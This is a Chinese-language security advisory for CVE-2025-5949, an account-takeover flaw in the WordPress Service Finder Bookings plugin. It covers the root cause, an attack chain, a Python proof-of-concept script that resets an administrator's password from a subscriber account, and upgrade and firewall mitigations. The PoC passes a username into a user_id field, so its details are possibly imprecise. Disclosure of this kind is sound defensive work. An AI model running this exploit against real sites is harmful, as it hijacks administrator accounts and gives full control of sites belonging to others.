CVE-2025-5949 WordPress Service Finder Bookings插件特权提升漏洞

漏洞信息

漏洞编号

CVE-2025-5949

漏洞类型

特权提升/账户接管

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Service Finder Bookings plugin for WordPress

漏洞概述

CVE-2025-5949是WordPress Service Finder Bookings插件中的一个高危安全漏洞，CVSS评分8.8。该漏洞存在于插件6.0及以下所有版本中，源于插件在处理密码更改请求时未能正确验证用户身份。攻击者利用此漏洞可以绕过正常的身份验证流程，重置任意用户（包括高权限管理员）的账户密码，从而实现账户接管和完全的站点控制。此漏洞需要攻击者具备至少订阅者级别的访问权限，但不需要任何用户交互即可发起攻击。由于WordPress插件广泛应用于商业网站，此漏洞可能影响大量使用该插件的服务型企业网站。

技术细节

该漏洞的根本原因在于Service Finder Bookings插件的密码重置功能存在身份验证缺陷。插件在处理密码更改请求时，未能充分验证请求发起者的身份与请求目标用户的一致性。具体来说，攻击者可以通过修改密码重置请求中的用户标识参数，将目标指向其他用户（甚至管理员账户），而插件未能检查当前认证用户是否有权限修改目标用户的密码。攻击者只需拥有WordPress站点的基本账户（订阅者角色）即可利用此漏洞。由于密码重置功能通常通过电子邮件验证，但攻击者可以在服务器端直接构造恶意请求绕过这一限制，实现对任意账户的完全接管。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress站点账户（最低订阅者权限）

STEP 2

步骤2

攻击者构造恶意密码重置请求，将目标用户ID指向管理员或其他高权限账户

STEP 3

步骤3

插件未正确验证身份，直接处理密码更改请求

STEP 4

步骤4

目标用户密码被强制更改，攻击者获得目标账户控制权

STEP 5

步骤5

攻击者登录目标账户，实现完全站点控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-5949 PoC - Service Finder Bookings Plugin Account Takeover
# Target: WordPress site with Service Finder Bookings plugin <= 6.0

TARGET_URL = "https://vulnerable-site.com"
ATTACKER_USERNAME = "attacker"
ATTACKER_PASSWORD = "attacker_password"
TARGET_USERNAME = "admin"  # Target can be any user including admin
NEW_PASSWORD = "Pwned123!"

session = requests.Session()

# Step 1: Login as low-privilege user
login_url = f"{TARGET_URL}/wp-login.php"
login_data = {
    "log": ATTACKER_USERNAME,
    "pwd": ATTACKER_PASSWORD,
    "wp-submit": "Log In"
}
resp = session.post(login_url, data=login_data)
print(f"Login status: {resp.status_code}")

# Step 2: Exploit password change vulnerability
# The plugin does not properly validate user identity before password change
change_password_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
exploit_data = {
    "action": "sf_update_account",
    "user_id": TARGET_USERNAME,  # Target user ID
    "new_password": NEW_PASSWORD,
    "confirm_password": NEW_PASSWORD
}
resp = session.post(change_password_url, data=exploit_data)
print(f"Exploit status: {resp.status_code}")
print(f"Response: {resp.text}")

# Step 3: Login with new password
target_login = f"{TARGET_URL}/wp-login.php"
target_data = {
    "log": TARGET_USERNAME,
    "pwd": NEW_PASSWORD
}
resp = session.post(target_login, data=target_data)
print(f"Account takeover: {'Success' if 'logged-in' in resp.text else 'Failed'}")

影响范围

Service Finder Bookings plugin for WordPress <= 6.0

防御指南

临时缓解措施

立即将Service Finder Bookings插件升级到6.0以上版本。暂时无法升级的情况下，可通过Web应用防火墙限制对密码重置功能的访问，或禁用该插件直到安全更新可用。同时建议审计所有管理员账户活动日志，检查是否存在异常的密码重置行为。